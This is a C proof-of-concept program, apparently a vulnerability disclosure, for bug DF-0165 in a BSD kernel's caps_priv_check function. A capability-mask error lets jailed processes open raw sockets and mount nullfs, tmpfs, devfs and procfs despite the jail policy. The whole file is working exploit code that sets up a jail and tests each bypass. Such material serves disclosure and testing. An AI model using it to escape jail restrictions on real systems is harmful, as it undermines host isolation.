/*
 * DF-0165 - caps_priv_check cap-corruption -> jail policy bypass.
 *
 * Run as root on the host. Creates a jail with the DEFAULT policy
 * (allow_raw_sockets=0, vfs_mount_nullfs=0, vfs_mount_tmpfs=0,
 *  vfs_mount_devfs=0, vfs_mount_procfs=0), attaches to it via jail(2),
 * then attempts the cap-gated actions inside the jail.
 *
 * Mechanism (confirmed in sys/kern/kern_caps.c:333-340):
 *
 *   res = caps_check_cred(cred, cap);
 *   if (cap & __SYSCAP_GROUP_MASK) {
 *       cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT; <-- BUG
 *       res |= caps_check_cred(cred, cap);
 *   }
 *   if (res & __SYSCAP_SELF) return EPERM;
 *   return (prison_priv_check(cred, cap));                <-- WRONG cap
 *
 * For cap = SYSCAP_NONET_RAW     = 0x61:  cap becomes 0x6  = SYSCAP_NONET
 * For cap = SYSCAP_NOMOUNT_NULLFS= 0xA0:  cap becomes 0xA  = SYSCAP_NOMOUNT
 * For cap = SYSCAP_NOMOUNT_TMPFS = 0xA2:  cap becomes 0xA  = SYSCAP_NOMOUNT
 * For cap = SYSCAP_NOMOUNT_DEVFS = 0xA1:  cap becomes 0xA  = SYSCAP_NOMOUNT
 * For cap = SYSCAP_NOMOUNT_PROCFS= 0xA5:  cap becomes 0xA  = SYSCAP_NOMOUNT
 *
 * In prison_priv_check (sys/kern/kern_jail.c:865-878):
 *     case SYSCAP_NONET:    return 0;   <-- allowed in jail
 *     case SYSCAP_NOMOUNT:  return 0;   <-- allowed in jail
 *
 * The per-capability switch cases that SHOULD have been hit:
 *     case SYSCAP_NONET_RAW:    check PRISON_CAP_NET_RAW_SOCKETS (line 919)
 *     case SYSCAP_NOMOUNT_NULLFS: check PRISON_CAP_VFS_MOUNT_NULLFS (951)
 *     ... etc.
 * are NEVER reached on the caps_priv_check() path.
 *
 * Output: one line per action; "*** BYPASS ***" appears when the per-cap
 * jail policy was bypassed (action succeeded despite policy=0).
 *
 * On a FIXED kernel every action would fail with EPERM.
 */
#include <sys/param.h>
#include <sys/jail.h>
#include <sys/mount.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <arpa/inet.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Match the kernel's struct null_args (sys/vfs/nullfs/null.h) */
struct df_null_args {
    char              *target;
    struct export_args export;
};

static int bypass_count = 0;

static void try_raw_socket_v4(void)
{
    int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s >= 0) {
        printf("  socket(AF_INET, SOCK_RAW, IPPROTO_RAW)  [SYSCAP_NONET_RAW]\n");
        printf("      -> OK fd=%d   *** BYPASS ***\n", s);
        close(s);
        bypass_count++;
    } else {
        printf("  socket(AF_INET, SOCK_RAW, IPPROTO_RAW)  -> %s (errno=%d)  -- correctly denied\n",
               strerror(errno), errno);
    }
}

static void try_mount(const char *fstype, const char *cap_name, const char *target,
                      void *data)
{
    int r = mount(fstype, target, 0, data);
    if (r == 0) {
        printf("  mount(\"%s\", %s)  [%s]\n", fstype, target, cap_name);
        printf("      -> OK   *** BYPASS ***\n");
        unmount(target, 0);
        bypass_count++;
    } else {
        printf("  mount(\"%s\", %s)  [%s] -> %s (errno=%d)\n",
               fstype, target, cap_name, strerror(errno), errno);
    }
}

int main(void)
{
    int jid;
    struct jail_v0 jv0;

    /* Set up directories. */
    mkdir("/tmp/df0165-src",          0755);
    mkdir("/tmp/df0165-mnt-tmpfs",    0755);
    mkdir("/tmp/df0165-mnt-devfs",    0755);
    mkdir("/tmp/df0165-mnt-procfs",   0755);
    mkdir("/tmp/df0165-mnt-nullfs",   0755);

    /* Drop a marker file in the nullfs source so we can prove the mount
     * actually exposes host content inside the jail. */
    FILE *m = fopen("/tmp/df0165-src/marker", "w");
    if (m) { fprintf(m, "HOST-CONTENT-VIA-NULLFS-BYPASS"); fclose(m); }

    /* jail(2) registers the prison AND attaches the calling process
     * (kern_jail_attach at sys/kern/kern_jail.c:227). Default policy
     * has all gated PRISON_CAP_* flags cleared. */
    jv0.version   = 0;
    jv0.path      = "/";
    jv0.hostname  = "df0165-test";
    jv0.ip_number = inet_addr("127.0.0.2");

    jid = jail((struct jail *)&jv0);
    if (jid < 0) {
        fprintf(stderr, "jail() failed: %s (errno=%d)\n",
                strerror(errno), errno);
        return 2;
    }
    fprintf(stderr, "jail() ok: jid=%d  (now jailed as uid=%d)\n",
            jid, getuid());

    printf("=== DF-0165 demo: cap-gated actions inside jail ===\n");
    printf("    (jail default policy: allow_raw_sockets=0,\n");
    printf("     vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)\n");

    try_raw_socket_v4();
    try_mount("tmpfs",  "SYSCAP_NOMOUNT_TMPFS",  "/tmp/df0165-mnt-tmpfs",  NULL);

    /* nullfs: kernel's get_fscap() matches fstype "null" (5-byte strncmp),
     * NOT "nullfs" -- so the user-side type name must be the bare "null". */
    {
        struct df_null_args na; memset(&na, 0, sizeof(na));
        na.target = (char *)"/tmp/df0165-src";
        try_mount("null", "SYSCAP_NOMOUNT_NULLFS", "/tmp/df0165-mnt-nullfs", &na);
    }
    try_mount("devfs",  "SYSCAP_NOMOUNT_DEVFS",  "/tmp/df0165-mnt-devfs",  NULL);
    try_mount("procfs", "SYSCAP_NOMOUNT_PROCFS", "/tmp/df0165-mnt-procfs", NULL);

    printf("=== end: %d cap-gated action(s) bypassed jail policy ===\n",
           bypass_count);
    return bypass_count ? 0 : 1;
}
